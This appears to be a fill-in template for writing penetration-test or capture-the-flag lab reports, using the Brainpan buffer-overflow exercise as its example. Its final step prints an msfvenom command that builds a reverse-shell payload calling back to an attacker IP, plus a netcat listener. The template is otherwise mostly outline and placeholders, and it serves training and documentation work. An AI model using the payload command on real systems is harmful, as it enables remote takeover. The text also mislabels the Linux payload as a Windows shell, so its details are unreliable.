靶场测试Writeup编写框架

Introduction

What is the environment of the target ? What kind of technology is needed for the attack ? What is the purpose of process ?

The process to develop the exploit in this post will follow the following eight steps:

Example:

Step 1 Fuzzing Step 2 Replicating the Crash Step 3 Finding the Offset to the EIP Register Step 4 Controlling the EIP Register Step 5 Finding Space for Shellcode Step 6 Finding Bad Characters Step 7 Jumping to the ESP Register Step 8 Writing the Exploit

Tools Used

A Windows host or virtual machine

A Kali Linux host or virtual machine

OllyDbg

Python

Searchsploit

Firefox

Msfvenom

Methodologies

we need to be required to fill out this penetration testing document fully and to include the following sections :

• Overall High-Level Summary and Recommendations (non-technical)
• Methodology walkthrough and detailed outline of steps taken
• Each finding with included screenshots, walkthrough, sample code.
• Any additional items that were not included

Information Gathering

Example:

The first thing to know is the local network address by using the ip addr command.

Enumeration: Nmap

Because the VulnHub virtual machines are in a downloadable and self-hosted format the machine gets an IP address from DHCP when it starts. This means that unlike online challenges such as Hack The Box the IP address of the machine is somewhat “unknown” beforehand.

The first thing to know is the local network address by using the ifconfig command.

nmap -sP 192.168.33.0/24

Running an initial scan with Nmap reveals ports 9999 and 10000 are open.

nmap -n -sV -Pn -T4 192.168.33.129 -oA nmap/initial

command exaplain:

nmap - network scanner tool used to discover hosts and services on machines.

-n - No DNS resolution

-sC - preforming script scan using default scripts.

-sV - preforming service version detection.

-oA - output in all formats.

-Pn - treating the host as online - skip host discovery (it was necessary for nmap scan on this machine).

Enumeration: Firefox

Enumeration: dirb

dirb scan reveals an interesting bin directory.

Enumeration: FirefoxPermalink

Visiting the bin directory with the Firefox browser reveals a downloadable executable with the name brainpan.exe.

Debugging: Step 1 Fuzzing

Suspecting exe application is vulnerable to a buffer overflow attack a simple Python fuzzer can be written to test this.

Debugging: Setting Up the Debugging Environment

Now that we know the brainpan.exe application is vulnerable to a buffer overflow attack it is time to configure the debugging environment to help develop an exploit. Make sure to startOllyDbg as Administrator, a window looking like the one below should appear.

.

.

.

Debugging: Step 8 Writing the Exploit

it is time to finish the exploit by generating and adding some shellcode .

Msfvenom can be leveraged to generate a Windows reverse shell shellcode that connects back to a listener on our attacking machine. Make sure to exclude any bad characters that where found in Step 6 with the -b option. The generated shellcode is 351 bytes long which neatly fits in the 522 C’s we have added to our buffer variable.

Note the use of EXITFUNC=thread to make an application crash less likely when the process crashes or exits.

command explain:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.33.110 LPORT=4444 EXITFUNC=thread -a x86 —platform linux -b “x00” -f c > sheelcode_linux_test.txt

msfvenom - rapid7 (creators of metasploit tool) tool for payload generation.

LHOST - attacker ip address.

LPORT - attacker ip port.

Options:
    -p, --payload            Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled             Prepend a nopsled of [length] size on to the payload
    -f, --format              Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder            The encoder to use
    -a, --arch                  The architecture to use
        --platform          The platform of the payload
        --help-platforms             List available platforms
    -s, --space               The maximum size of the resulting payload
        --encoder-space       The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars             The list of characters to avoid example: 'x00xff'
    -i, --iterations           The number of times to encode the payload
    -c, --add-code              Specify an additional win32 shellcode file to include
    -x, --template              Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out                   Save the payload
    -v, --var-name              Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message

nc -nvlp 4444

nc - netcat, tcp and udp tool for connections and listens.

-l - listen for connections.

-v - verbose output.

-p - port number.

Exploitation: Initial Shell

……

Privilege Escalation

…..

Exploitation: System

…..

Exploitation: Root

……

Conclusion

This challenge helped me understand the process behind xxx and what goes on under the xxx a lot better. Documenting the process ……